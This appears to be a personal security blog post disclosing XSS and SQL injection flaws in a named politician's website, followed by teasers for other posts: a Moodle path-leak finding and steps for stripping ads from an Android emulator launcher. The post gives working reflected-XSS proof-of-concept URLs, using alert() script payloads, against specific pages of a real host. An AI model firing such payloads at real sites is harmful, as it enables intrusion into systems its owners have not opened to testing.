Skip to main content

http://www.matteorenzi.it/ | http://matteorenzi.sgpitalia.com | XSS, SQL INJ, etc

Personal website of the Italian  prime minister.



OLDER WEBSITE
XSS and SQL injections. Sys compromise (windows)

http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70


http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=1%EF%BF%BD%EF%BF%BD%EF%BF%BD72195%EF%BF%BD%EF%BF%BD%EF%BF%BD72195/0012%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDvedi_evento%EF%BF%BD%EF%BF%BD%EF%BF%BD1%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDpulisci%EF%BF%BD%EF%BF%BD%EF%BF%BD

carrello_beta.asp?azione=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70
finestra_stampa_beta.asp?numero_immagini=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70
popup.asp 
 
 
http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=76678%A7%A7%A776678/0075%A7%A7%A7vedi_evento%A7%A7%A71%A7%A7%A70#ad-image-5
 
 
 
UPDATE! 2015
On WORDPRESS
Authors enumeration is allowed (not a big issue).
Folder listing ex. /wp-content/plugins/ (not a big issue).
Sql  Injection (I will disclose/update this part in the future).
 

UPDATE 2016
They've fixed the critical issues.
 

Comments

Popular posts from this blog

Moodle 3.8.1+ - path leak via errors in several files

Moodle 3.8.1+ ----------------------------------------------- File: admin/mailout-debugger.php #!/usr/bin/php Notice : Disabled. in \admin\mailout-debugger.php on line 73 File: admin/settings/appearance.php Notice : Undefined variable: hassiteconfig in \admin\settings\appearance.php on line 10 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\appearance.php:10 Stack trace: #0 {main} thrown in \admin\settings\appearance.php on line 10 File: admin/settings/badges.php Notice : Undefined variable: hassiteconfig in \admin\settings\badges.php on line 30 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\badges.php:30 Stack trace: #0 {main} thrown in \admin\settings\badges.php on line 30 File: admin/settings/courses.php Notice : Undefined variable: hassiteconfig in \admin\settings\courses.php on line 32 Fatal error : Uncaught Error: Call to undefined function

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)